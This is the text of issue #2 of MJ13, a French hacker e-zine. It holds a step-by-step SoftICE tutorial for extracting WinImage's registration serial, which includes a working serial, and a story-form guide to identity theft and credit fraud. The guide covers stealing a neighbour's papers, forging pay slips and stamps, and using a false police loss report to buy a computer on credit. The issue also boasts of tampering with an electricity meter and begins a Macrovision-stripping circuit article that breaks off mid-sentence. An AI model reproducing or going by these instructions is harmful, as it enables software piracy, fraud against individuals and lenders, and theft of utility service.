1¾ MM MM JJJJJJJJJJJJJJ 11 33333333333 MMM MMM JJ 1111 33 MM MM MM MM JJ 11 11 33 MM MM MM MM JJ 11 11 33 MM MMMM MM JJ 11 33333 MM MM MM JJ 11 333 MM MM JJ 11 33 MM MM JJ JJ 11 33 33 MM MM JJJJJJ 11 333333333 ISSUE #2 I/ INTRODUCTION 2/ % DE PIRATAGE INFORMATIQUE [ALLIGATOR427] 3/ COURS DE CRACK 2 [SaMSoN] 4/ HACK DES SOCIETES DE CREDITS (THEME A) [ALLIGATOR427] 5/ BYE LA MACROVISION [MAD666] 6/ VOUS DEBUTEZ EN CRACK? QUE CHOISIR? DOS, WIN? [SaMSoN] 7/ INITIATION AU VIRUS [UnK MnemoniK] 8/ TROUVEZ DES WAREZ!!!! [Shybe] 9/ CDRWIN 3.0a, TRACAGE POUR REGISTRED [DONGLE KILLER, ALLIGATOR427] 10/ VIRUS, EXEMPLE! [UnK MnemoniK] 11/ VIRUS BATCH [DarK BirD (Special thank's)] ******************************************************************************** INTRODUCTION nous avons creer cet e-mag pour diverses raisons, la principale etant de mettre nos connaissances (informatiques & autres) en commun, sur des sujets aussi divers que le Hacking, Phreaking, Virus, Crash, Anarchie, Crack & Programmation de tous les types. On en oublie surement certains.. Ce mag se veut, se doit d'etre a tendance ultra liberaliste et + les fautes d'orthografes y sont volontaires ;-) On peut ecrire sur tout, de votre premier rapport avec un pc, aux hacks, phreak etc en passant par votre premier rapport sex avec votre elephant! on peut aussi construire des bombes, planter des fleurs, recreer la couche d'ozone, piquer des larfeuilles... on fait egalement ca pour envoyer un max de monde en prison! si!!! ------------------------------------------------------------------------------ MEMBRES: | Activit‚ | ----------------------------------------------------------------------------- ALLIGATOR427 / CREATEUR / REDACTION / CRACKER / COURRIER / PhaNToM / CREATEUR / REDACTION / CRACKER / HACKER / MAD666 / CREATEUR / REDACTION / HACKER / COURRIER / SaMSoN / CREATEUR / REDACTION / CRACKER / DIFFUSION / UnK MnemoniK / REDACTION / VIRUS / JLB53 / REDACTION / CRACKER / DONGLE KILLER / REDACTION / CRACKER / PROGRAMMATION PASCAL, DELPHI, ASM. SHYBE / REDACTION / CRACKER / DIFFUSION / RECHERCHE FTP / NECROMANCER / RECHERCHE WAREZ / RANDALL FLAG / CRACKER / BLURPY / RECHERCHE WAREZ / Mister WIL / CRACKER / DIFFUSION / SKELETOR / RECHERCHE WAREZ / Un Welcome special a UnK MnemoniK, de la part de tous. Special Thank's a DaRK BiRD, pour sa participation & article. _____________________________________________________________________________ SITE: www.mygale.org/08/samson/ www.mygale.org/01/mister/ www.mnet.fr/maraga www.toptown.com/HP/mj13 COURRIER: alli427@hotmail.com ----------------------------------------------------------------------------- MJ13 ne saurait etre tenu responsable de l'irresponsabilit‚ de ces auteurs par leurs articles ecris, verifi‚s ou pas, et des problemes qui pourrait s'en suivre pour vous, lecteurs. nous ne serions etre tenus responsables des causes de la lecture & mise en application des articles ci dessous. Vous savez tous quel procedure employ‚ pour voler dans un supermarch‚, et vous ne le faites pas pour autant! il est evident que ces articles ont ‚t‚ ecris dans un but d'etude, evitez de prendre ca comme un aller direct a la prison de votre departement. a priori, nous acceptons tout articles traitant de h/p/c/c/a/v, et meme les autres. en aucun cas des articles de themes d'ethique racial ne saurait etre tol‚r‚s et admis. si vous voulez casser du noir, ecrivez a Le Pen et pas a nous. toutes personnes faisant partie de notre groupe se doit d'ecrire des articles sign‚es, et de ne divulguer son identit‚ a quiconque, pour quelques raisons que ce soit. L'identit‚ des personnes participant a cet e-mag doit rester confidentiel, afin de s'auto proteger, et de rester .../ Virtuels?\... Vous ne faites pas partie du groupe et souhaitez nous envoyer des articles, nous poser des questions, nous critiquer? ALLEZ-Y!!! vos articles seront lus, soumis a divers menbres & diffus‚s si jug‚s int‚ressant... vos courriers seront trait‚s avec SOINS, et nous vous repondrons soit par mail, soit par diffusion dans notre rubrique questions/ reponses. Vous pouvez egalement vous enregistrer pour recevoir l'issue #3 des sa sortie a l'adresse courrier MJ13: alli427@hotmail.com MJ13 est un magazine de libre diffusion, a but non lucratif, et donc gratuit. Nous vous invitons a le diffuser au maximum. Bonne lecture. ------------------------------------------------------------------------------ WANTED: Articles programmation, cours C, C++, PASCAL..., articles a themes A.. ------------------------------------------------------------------------------ Voici donc l'issue 2.0, qui n'etait plus attendu!!!! ALLIGATOR427 & MAD666 ******************************************************************************** | % DE PIRATAGE INFORMATIQUE | | PAR | | ALLIGATOR427 | ******************************************************************************** ALLIGATOR 427 au cerveau de jade et d'argent. je mouche mon nez, r'monte mes chaussettes, je vous attends. *********************************H.F.T****************************************** Juste histoire de voir comment notre cher pays est plac‚ par rapport au piratage logiciels informatique... PAYS Pourcentage de Piratage: -------------------------------------------------------- Allemagne 71% Australie 45% Belgique 66% Espagne 87% Etats Unis 39% France 83% (c'est pas mal du tout nan?) Italie 86% Japon 96% Singapour 43% Suisse 60% Taiwan 93% Thailande 99% Pole sud: 0% Source: Business Software Alliance, Bas‚s sur un rapport de Novembre 1996 ALLIGATOR427 / MJ13 ******************************************************************************** ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Initiation au crack, cours 2 ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ par ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ÀÄÄÄÄÄÄÄSaMSoNÄ[Mj13/Dsk]ÄÄÄÄÄÄÙ ³ ³ ³ ³ "Messieurs les mecs des ministŠres ³ ³ En meme temps que vos impots ³ ³ Vous pouvez faire monter vos bieres ³ ³ Y'en a marre !" ³ ³ Leo Ferre ³ ³ ³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ³ ³ 1. Introduction ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ 2. Des Breakpoints... ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ 3. Winimage 2.20: le serial ³ ³ 4. Les Credits de Mr. SaMSoN ³ ³ 5. Contactez moi! ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 1. Introduction ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Dans le premier cours, nous avons fait une approche de Winice, en presen- tant rapidement les fonctions de bases. Nous avons egalement fait un crack simple de la boite de dialogue a l'entree de Winimage 2.50, en detaillant la marche a suivre de A a Z. Je vous avait promis de vous montrer comment trou- ver le serial qui correspond a votre nom... Malheureusement, j'ai pomme la version 2.50 (saint bordel de mon disque dur :)... Je vais donc faire cette lecon avec la version 2.20, largement repandue dans les CD-Rom (ou cederom:) fournis avec les revues... Malgre tout, le programme, en ce qui concerne la procedure d'enregistrement, est le meme pour les versions 2.20, 2.50 et 3.0 de Winimage. Seuls les offsets changent. Ainsi, le serial realis‚ avec Winimage 2.20 fonctionnera avec les versions ulterieures... Avant d'attaquer le serial de Winimage, je vous ferai d'abord une presen- tation generale du principe des breakoints sous Windows. NB: Vous pouvez egalement consulter des tutoriaux en Anglish, le plus se- rieux etant a mon sens celui de +ORC (cherchez "Fravia" avec un moteur de recherche sur le Web) ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 2. Des Breakpoints... ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Pour pouvoir debugger des softs sous Windows, les Breakpoints sont essen- tiels. Il s'agit de "points d'arrets" dans le deroulement d'un programme. En effet, si vous lancez Winimage (ou tout autre soft Windaube) et que vous u- tilisez le Breakpoint de base Ctrl-D, Winice apparait mais vous n'etes cer- tainement pas dans le code source de Winimage, mais quelque par dans les procedures de Windows: l'inconvenient du multitache... On peut (et doit) donc poser des Breakpoints (BP) sur un offset precis du code source (BPX xxxx:xxxxxxxx ou bien F9 apres avoir mis le curseur sur l'offset vise) ou bien encore sur des procedures de Win95. En effet, les softs programm‚s pour Windows utilisent de nombreuses fonctions proposees par Windows. Ainsi on peut poser des BP sur les boites de dialogues (BPX DIALOGBOXPARAM) ou bien s–r les "messagebox" (BPX MESSAGEBOX) mais sur bien d'autres fonctions (BPX CREATEMENUITEM......) Il m'est impossible de les citer tous, a vous (et a moi) d'en decouvrir d'autres jours apres jours... On peut egalement en poser sur un offset memoire (BPMB xxxx:xxxxxxx) ou sur des interruptions (BPINT) ou sur ce qui sort par le port paralelle (BPIO) Vous le comprenez aisement, trouver le BP efficace n'est pas toujours chose facile. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 3. Winimage 2.20: le serial ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ On lance donc Winimage, et la boite de dialogue d'enregistrement (opti- ons-|'enregistrement). On entre un nom et un serial bidon (pour moi: "Samson [Mj13] et 12121212 comme serial). La, on va utiliser un BP assez complexe. Il s'agit en effet d'arreter le soft apres avoir valide le nom et le serial avec OK mais avant d'avoir le message qui nous indique que le serial entre est incorrect. On fait donc "surgir" (attention, c'est violent :) Winice avec Ctrl-D... La, on va chercher le nom de la "task" pour Winimage. Il s'agit du nom uti- lise par Windows95 pour le deroulement de Winimage. On entre donc l'instruc- tion "task": TaskNameÄÄÄSS:PPÄÄÄÄÄÄStackTopÄÄStackBotÄÄStackLowÄTaskDBÄÄhQueueÄÄEvents Winimant 0000:0000 0066D000 00670000 1BBE 0A8F 0000 Winshade 0000:0000 0066E000 00670000 190E 2817 0000 Impwm 0000:0000 0069D000 006A0000 1A56 19CF 0000 Explorer 0000:0000 0066C000 00640000 1B86 1B37 0000 Any Key To Continue, Esc To Cancel On voit donc les differents taches qui tournent sur mon systeme. Celle qui nous interesse, c'est "Winimant". On note simplement le nom. On execute maintenant l'instruction "Hwnd Winimant", pour avoir le detail des boites de dialogues "en route" avec Winimage: WindowÄHandleÄÄÄHQueueÄÄSZÄÄQOwnerÄÄÄÄClass NameÄÄÄÄÄÄÄÄÄWindow-Procedure 02B8(1) 0A8F 32 WINIMANT #32770 (Dialog) 078F:00004757 02BC(2) 0A8F 32 WINIMANT Static 078F:000052FA 02C0(2) 0A8F 32 WINIMANT Edit 079F:00000BF4 02C4(2) 0A8F 32 WINIMANT Static 078F:000052FA 02C8(2) 0A8F 32 WINIMANT Edit 078F:00000BF4 Any Key To Continue, Esc To Cancel Cette instruction nous montre donc la composition de la boite de dialogue selectionnee: - la "fenetre maitresse" dont le Window Handle est suivi de (1) et ses composants, suivis de (2). - Le class name "Static" designe tout ce qui peut etre ecrit ("Nom:";"Serial:") - le class name "Edit" designe les zones de saisie, "Static" qui designe les zones de texte non-editables, etc... On note le Window Handle de l'une de ces zone de saisie, 02C0 par exemple. On a enfin tous les elements pour poser un BP correct: "BMSG 02C0 WM_Gettext" On relance donc le deroulement de Winice avec la touche F5, et l'on valide le nom et le serial entres en cliquant sur "OK". Rapidement, Winice apparait on va enfin pouvoir commencer a tracer dans Winimage. La, il faut faire du "trace over" avec la touche F10, comme un tar‚, jus- qu'a ce que la boite de dialogue nous indiquant "Donnees incorrectes" appa- raisse. Quant celle-ci est validee, on a le code suivant sous les yeux: xxxx:0040A500 CALL 0040D335 <ÄÄÄ Test du serial xxxx:0040A505 ADD ESP,08 xxxx:0040A508 XOR ECX,ECX xxxx:0040A50A MOV [00421024],EAX xxxx:0040A50F TEST EAX,EAX <ÄÄÄ Si EAX different de 0 xxxx:0040A511 JNZ 0040A53F ÄÄÄÄÄÄ¿ Alors Code Faux xxxx:0040A513 MOV EAX,00000001 ³ Sinon Bon xxxx:0040A518 PUSH 00002000 ³ xxxx:0040A51D PUSH 0000042D ³ xxxx:0040A522 MOV [00420C30] ³ xxxx:0040A527 PUSH 0000042B ³ xxxx:0040A52C MOV [00420B8C],EAX ³ xxxx:0040A531 MOV [00420B78],CL ³ xxxx:0040A537 MOV [00420E28],CL ³ xxxx:0040A53D JMP 0040A55A ³ Saut vers: "Code bon" xxxx:0040A53F XOR EAX,EAX <ÄÄÄÄÄÙ Debut de la procedure "Faux serial" xxxx:0040A541 PUSH 00002000 xxxx:0040A546 PUSH 0000042D xxxx:0040A54B MOV [00420C30],EAX xxxx:0040A550 PUSH 0000042A xxxx:0040A555 MOV [00420B8C],EAX xxxx:0040A55A PUSH ESI xxxx:0040A55B CALL 0040EB84 <ÄÄÄ Execute la boite "Donnees incorrectes" xxxx:0040A560 ADD ESP,10 xxxx:0040A563 PUSH 00 En tra‡ant comme un fou, on arrive sur le Call de l'offset 0040A55B. Quand on l'execute, la boite de dialogue "Donnees incorrectes" apparait. Il faut maintenant essayer d'analyser le code alentour. - On repere a l'offset 0040A53D un JMP inconditionnel. La procedure "Faux serial" commence donc a l'offset d'apres: 0040A53F. - On cherche donc un saut conditionnel qui renvoie vers cet offset. - On le repere pas tres loin: xxxx:0040A511 JNZ 0040A53F - Peu avant ce JNZ, on repere un xxxx:0040A500 CALL 0040D335; Il y a 95% de chances pour que ce soit ce CALL qui verifie si le serial est bon. On pose donc un BP sur ce call. Deux solutions pour ca: - placer le curseur sur l'offset vise et appuyer sur F9. (Je rappelle que la touche F6 permet de passer de la zone "Edit" de Winice a la zone "Code") - faire un "BPX 0040A500" Les deux ont un resultat equivalent. On remet Winimage en marche avec Winice (F5). On relance la boite de dialogue d'enregistrement. Comme tout a l'heure, on rentre des donnees bidons qu'on valide avec OK. La,Winice apparait a cau- se du BP place plus haut. On n'en a plus rien a foutre. [Petite paranthese: la commande BL vous donne la liste des Breakpoints. Vous pouvez en effacer (BL) en desactiver (bd xx) puis les reactiver (be xx)]. On continue avec F5, jusqu'a ce que Winice s'arrete sur l'offset 0040A500. On "rentre" dans le CALL avec F8. La, on entre vraiment dans la phase de recherche du serial... Je ne vais pas m'amuser a vous retranscrire toute la procedure. Je vais donc vous si- gnaler les offset interessants. Au fur et a mesure que l'on trace on essaye d'abord de reperer les ins- truction du type "PUSH WORD PTR [EBP+08]" et "LEA ECX,[EBP-14]" (bien enten- du, les valeurs ne sont citees qu'a titre d'exemple). Au debut de la procedure, on a l'instruction suivante: xxxx:0040D34B PUSH DWORD PTR [EBP+08] En haut de l'ecran Winice m'indique (ce sera different pour vous): SS:0066F664=00420E28 Donc, je fais un "D 00420E28" pour afficher le contenu de cet offset. Et winice m'affiche "Samson [Mj13]" le nom entre pour l'enregistrement. xxxx:0040D358 LEA ECX,[EBP-14] Je fais un "D EBP-14" cd qui nous donne le serial bidon xxxx:0040D35B LEA EAX,[EBP-28] Un "D EDP-28" ne nous donne pas grand chose. Mais, on a deja eu le nom, le serial bidon. Tout porte a croire que le bon serial sera "case" dans cet offset. On garde donc un oeil dessus. xxxx:0040D361 CALL 0040D2E7 Apres avoir execute ce CALL, l'offset [EBP-28] se modifie et nous donne "2D3A0D60". Cela ressemble a un serial. Mais nous ne somme qu'au debut de la procedure et il ne s'agit probablement que d'une etape interme- diaire. xxxx:0040D395 CALL 0041B8D8 Nouvelle modification de [EBP-28]: "413F26AB" xxxx:0040D3B7 CALL 0040D2E7 Nouvelle modification de [EBP-28]: "44402684" xxxx:0040D3E0 CALL 0040D2E7 Nouvelle modification de [EBP-28]: "3D3F26E1" Nous n'avons, ensuite pas d'autres modifications de cet offset... On relance donc la procedure d'enregistrement avec exactement le meme nom que precedemment et ce que l'on pense etre le serial (pour moi:3D3F26E1) Et... Ca marche! Donc, pour moi: Nom: Samson [Mj13] Serial: 3D3F26E1 Bon, c'est pas forcement evident a expliquer, alors je ne sais pas si j'ai toujours ete clair. Mais, en vous accrochant, ca devrait passer. Quand vous aurez fait ce crack, essayez-vous sur le serial de Winzip, la procedure est assez semblable. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 4. Les credits de Mr Samson ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Un grand salut a: Dsk (Snem, Spanik, Dark Angel...), contactez nous: www.mygale.org/11/snem F-Kaos (Cassio-P, Crifalo), Piracy.Fr Tous ceussent qui trainent sur #Warez-France: Ofx, Loginz, Mht, Capitaine, Godfroy, Hocus, Betty3D, etc... Unknown Mnemonic (bienvenue chez nous) [NDLR:voir son article sur les virus.] Vous qui trainez dans la salle d'info de la fac :) ET BIEN SUR LES MEMBRES DE MJ13 -= Et a tous ceux qui font bouger la scene francophone!!! =- ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ 5. Contactez moi! ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ E-mail: samsondsk@hotmail.com (plus d'e-mail massons@xiii.univ-angers.fr :) Ma page Web pour trouver mes cracks, des outils,le dernier Mj13... http://www.mygale.org/08/samson/ Sur Irc: Channel #Warez-France ou #Warez_France Nick: Samson ou {Samson} Je recherche egalement des pages Web qui luttent contre le fascisme en France pour une prochaine section de ma page et bien sur, si vous avez une page Web "underground" francophone, n'hesitez pas! ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ Samson [Mj13/Dsk] ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ******************************************************************************* | HACK DES SOCIETES DE | | CREDITS | | PAR | | ALLIGATOR427 | ******************************************************************************* ALLIGATOR 427, au long regard phosphorecent, aux ailes de cachemire safran, je grille ma derniere cigarette, je vous attends... Je sais que desormais vivre est un calembour, la Mort est devenu un etat permanent, le monde est un Phantom, aux hyenes &.. aux vautours... *******************************H.F.T******************************************* Ca y est... J'ai recul‚ mon compteur. E.D.F est venu relev‚ les nouveaux num‚ros, et ils ont plong‚!!! Fabuleux! Me voici avec une facture de 800 balles pour 6 mois. Correct! Ca s'arrose. 2721eme cuite... Ca aussi ca s'arrose... Un double arrosage! Putain de cuite, ca remonte! il est 20h et j'suis deja bourr‚. Faut que j'reste debout, j'ai un rencard avec la voisine du troisieme a 22h. Dans l'attente, j'vais cracker un p'tit logiciel, voir si les cours de SaMSoN sont bien clair, ou s'ils sont comme moi. C'est a ce moment precis que le drame se produisit! Je m'eclate la tronche sur mon PC! Haaaa... l'ecran fume, ho, pute de vierge! l'unit‚ centrale aussi. j'suis dans la merde, tout est cram‚. Il m'faudrait un nouveau pc! et ce rapidos! Reflechissons: Une fois payer ma facture EDF, mes clopes, la bouffe pour le mois, il me restera entre 400 et 430 balles! genial! Aucun doute, c'est pas avec ca que j'vais m'payer une becane! Quand au credit, en suplement d'etre au chomdu depuis 7 ans (et pourtant je cherche), on a meme pas payer la tel‚! On a trouv‚ un compromis et j'leur file 100balles par mois, mais jamais il ne m'en accorderont un autre... Putain, si j'avais pus changer d'identit‚ quelque heures. Mais ca.. Quoi-que... Une id‚e enflam‚e vient de me rentrer dans la tete, etre un autre que moi... ouais. Mais qui? vaut mieux que j'prenne une personne que j'connais mais qui risque pas de faire le raprochement avec moi. QUI??? vite, une biere, ca m'aidera a penser, puis tt facons j'ai decuit‚.. Tiens, j'vais m'calmer.. 3 valium! au diable l'avarice... 20h40: tjrs pas de cible.. 20h50: mon rencard approche.. son mec part boss‚ a 22h00, ma femme se pieute a 21h00, tu parles, on s'eclate! son mec, tu parles d'1 con! Agent de securit‚ qu'il est.. il s'l'a joue rambo tandis que j'm'envoie sa femme..., la j'rigole!! 21h10: son mec... il m'connait a peine. bonjour dans l'escalier, par contre, moi j'connais tout sur lui. Voila une cible potentiel! 21h30:je dresse une strategie: Je reste chez la gonzesse, et quand elle dort je fouine. faut trouver une piece d'identit‚ a lui, un bulletin de salaire, une quittance de loyer ou EDF, un RIB et ca devrait coller. 21h45:1 autre biere.. 22h00: un oeil par la fenetre, sa bagnole est plus la.. Je monte. salut beaut‚, seul? elle se jette sur moi et... j'vous passe les details, non mais! 22h33, l'affaire est boucl‚, fallait qu'ca speed, et j'ai autre chose a penser elle dort pas encore! bon, ben, j'vais l'interroger comme si de rien etais. Tu t'en sors financierement? t'as des credits? et ton mec, il en a? il t'aide? juste un pour la bagnole, juste 1 credit.. endorts toi.. j'vais pas lui chanter une berceuse qd meme! 23h30: ca y est!! si!! elle pionce! allez go, au boulot. j'me leve en douceur, et hop, dans la cuisine. au mur un truc en pendant avec inscrit "PAYER" et "A PAYER". ca simplifie la tache ca.. dans les payer: une facture de telephone, la redevance tel‚, EDF!!! ha! elle a et‚ pay‚ y'a un mois. zzou, dans la poche, j'la r'mettrais d'main! Y'a aussi un relev‚ de compte qui fera office de RIB, j'aurais pus l'piquer au courrier m'enfin j'suis press‚ (de finir ce putain d'article!) direction la salle, j'ouvre un premier placard, rien.. un second et hop, dans une pochette rouge, les bulletins de salaire! et hop, le dernier, et pendant que j'y suis j'vais meme prendre les 3 derniers + un bulletin dans les premiers. des photocop et ca ira.. (j'tiens a preciser qu'on peut faire des bulletins de salaire soi meme, en reprenant les cotis. sociales, que l'URSAFF se fera un plaisir de vous donner, prenez aussi le num de SIRET pour refaire un tampon en vitesse... les dates, des fois ou on telephonerais a la boite, on est jamais assez prevoyant) Maintenant, une piece d'identit‚... dans le couloir, au porte manteau, y'a 2 blousons a lui.. Allez, j lui fais les poches! Paf, ca n'aurait su rater, pas de permis de conduire mais une piece d'identit‚. Crayon, papier et j'note: nom, prenom, date de naissance, nøde la piece... celle la, j'peus la remettre.. j'ai tout ce qui me faut. 0h50: je redescends me coucher... 9h10: reveil.. les gosses a l'ecole, la femme j'sais pas ou.. pour moi c'est une bonne journ‚e qui commence. une biere! Hey, c'est la premiere! pas de commentaires! une douche, un coup de rasoir, des fringues propres et il est deja 10h30. bus pour me rendre a une boutique ou l'on fait des photocopies seul. 1f60 et voila mes bulletins de salaires, en meilleurs etats que les originaux. j'vais les chiffoner un poil. voila, maintenant elle sont plus ressemblante!. il est midi.. j'vais boire l'apero. 15h00: sortis du bar. 15h10: direction le commisseriat central de ma p'tite ville: TOULON j'entre.. -monsieur? m'interpelle t'on. -oui, excusez moi mais j'ai un petit probleme, j'ai perdu mon portefeuille, et je me trouve sans piece d'identit‚ ni permis, c'est ennuyeux. -Nous allons vous faire remplir une declaration de perte, ca fera office de piece d'identit‚ ou permis pour 2 mois. -ha, ouf, vous ne pouvez imaginez combien vous me rendez service. -mais nous sommes la pour ca.. (menteur qu'ils sont!) je remplis donc cette declaration de perte, il va sans dire que j'ai appris par coeur le nom, prenom & date de naissance de mon cher voisin. arrive le moment ou on demande le numero des pieces... alors la, je sors mon papier ou c'est not‚ et j'inscris.. (ca marche aussi sans le numero!) je lui remets tout ca, lui demande de me la tamponner, en cas ou on prendrais ce papier pour un faux(je demande pour faire lm'ignorant! il tamponne toujours!). il le fait, et, adieu & merci! sisi, ca se passe comme ca! me voila donc avec tous les papiers necessaires au credit. j'commence a etre press‚ vu l'heure, et il me faut un magasin style supermarche ou grosse surface avec meubles et tout.. un petit magasin se rapellerait trop facilement de mon visage. je choisis conforama, et m'y rends en taxi. voila l'utilisation ingenieuse de mes 400balles de fin de mois.. j'y entre. mon coeur cogne.. et si ca foire??? qui ne tente rien n'a rien et j'y tiens a prendre un nouveau pc. rayon informatique. la j'y connais plus rien en informatique, j'laisse un vendeur me faire son baratin.. faut surtout pas que je prenne la plus grosse becane, avec scanner, imprimante etc.. j'vais meme prendre la promo a 9 990f. je reste un peu sceptique au baratin du vendeur, mais il croit me trainer dans la farine et hop! l'affaire se conclut. arrive enfin le mode de paiement. je sors: a credit... et la il me cite: 1 piece d'identit‚, 1 rib, vos 3 derniers bulletins de sal- aires, et une quittance loyer, facture telecom, edf... j'ai tout dans ma poche, j'lui sors avec la declaration de perte... la il regarde ca.. et moi j'lui explique que j'ai perdu mes papiers et que je sors du commissairiat etc, etc.. il a pas envie de perdre son pourcentage, donc il accepte le tout.. quand il me demande combien d'apport cash je fais, je prends un air surpris, et lui dis tres gentiment que je pensais qu'il n'y avait rien a payer au depart (vous pouvez aussi lui filez 500f, ca passe mieux).. il pose tout un tas de question, montant de loyer, nombre d'enfant a charge etc... j'connais l'voisin, le loyer? j'le descends de 500 balles, enfant? y'en a pas! etc... 10mn sur minitel et voila.. il vous dis que c'est bon.. normalement... je rentre, allume mon nouveau pc,oublie la voisine, ma femme et me fais arreter 6 mois plus tard, au cours de mon arrestation,ca se passe mal, et j'tue 1 flic avec un ecumeur, j'suis jetter dans une cave avec des grilles sur une fenetre en aglomar‚, et c'est de la que j'vous raconte ca... plus que 20 ans a tirer, a defaut de la voisine... Bon, j'ai abr‚g‚, mais l'id‚e de base y est, et sachez que ca marche, j'espere. j'avais le choix entre ca, ou des cours d'asm! mais sans pc, pas de possibilit‚ de cours!!! alors... J'ai abreg‚ disais-je, lisez entre les lignes... cherchez pas une voisine au troisieme... j'ai voulu par cet article, trouvez et expliquez une faille de plus de notre systeme. Bien que, je me rep‚te, la technique de base est bonne et fonctionne, je l'ai deja vu faire, je ne me tiens en aucun cas responsable de vos actes et test. Quand a moi, je n'habite pas TOULON, et n'ai pas de voisine au troisieme. Je remercie le commissairiat de TOULON ainsi que les magasins CONFORAMA pour leur aimable collaboration!! PS: Si je mourrais enferm‚ suite a cet article, je ne veux en aucun cas etre mis en biere.. non.. Quand le pinnochio baveux poussera ma brouette a Lancoux j'veux qu'on m'degaze au gin/Sinthol, dans une piole de Jonnhy Walker, a la Vodka d' chez warold; avec du Tomato campell!!! J'veux qu'on m'serve un apero, si possible un double zero, afin de rencontrer Blanche Neige, et de fumer un des sept nains!.. je compte sur vous.. Je recherche a peter tous sites pedophiles! Fuck a tous les pedophiles!!! pour me contacter: ecrire au courrier... ALLIGATOR427 / MJ13 ALLIGATOR 427, au souffle d'or et de diamant, je sais que vous etes fin pret, je vous attends. Je sais que tu as la beaut‚ destructive et le sourire vaincu comme un dernier soupir, tu sais que nos enfants s'appeleront Vers de terre... 'hft' A ma Femme. Je sais que vos machoires distille... l'agonie, a chaque parole!...'hft' A Vous tous... ******************************************************************************** ******************************************************************************* MACROVISION ,ou comment "cracker" les cassettes videos. Par MAD666 ******************************************************************************* Fichiers additionnels:MVISION1.GIF: implantation des composants. MVISION2.GIF: Sh‚ma circuit imprim‚ double-faces (200dpi) Voil… enfin ce sujet tant attendu par certains membres du groupe. Historique: Depuis une 10Šne d'ann‚es,les fabriquants/dupliqueurs de cassettes ont ‚t‚s confront‚s … un problŠme:Le Piratage. Apr‚s de nombreuses ‚tudes par des ing‚nieurs/‚lectroniciens,ils trouvairent un moyen de protection contre ce piratage,ce qui,… priori,et a forciori aussi ;-),parraissait materiellement impossible … faire au depart sans ‚lectronique sp‚cialis‚ dans les magnetoscopes. Il fut mis au point differents systemes,chacun propres … chaque fabriquants/dupliqueurs. Il se posa alors un probleme:Chaque magnetoscope n'etant pas adapt‚ sp‚cifiquement … chaque systemes,cela rendait tout simplem- -ent illisible certaines cassettes sur certains modŠles de magn‚toscope !!! Vers 1995,il fut d‚cid‚ d'un systeme unique de protection pour tout les fabriquants/dupliqueurs,et ce,en collaboration avec les fabriquants de scopes afin de rendre la protection totalement transparente pour l'utilisateur,et pour quelle soit le plus fiable possible. Proc‚d‚: La macrovision est un poc‚d‚ relativement simple qui joue entre la synchronisation des 2 scopes relier entre eux. En r‚sumant rapidement : On insŠre des lignes de synchro avant le signal image,ce qui a pour efait, lors d'une copie,de ne pas copier ces lignes convenablement sur le scope de destination,et donc,de rendre la copie quasi illisible (sottement de l'image, spot lumiere ...) En jouant sur la synchro verticale d'un moniteur,on peux visualiser ces lignes ind‚sirables en baissant l'image vers le bas.il apparrait alors,en haut,des lignes de synchro qui ne devrait plus etre l… si on veux pouvoir copier les cassettes ... RemŠde: Un petit circuit electronique … inserer entre l'entr‚e et la sortie SCART des 2 scopes,qui permet,tout simplement,d'effacer ce signal indesirable. Ce petit circuit ne vous co–teras gŠre plus de 300F et rend toute protection in‚fficace (la copie elle-mˆme peux ensuite ˆtre recopi‚e … l'infini sans ce boitier). Ce circuit ce compose de quelque composants facile … trouver (… part 1 ou 2 un peu plus difficile),d'un circuit imprim‚ double-faces 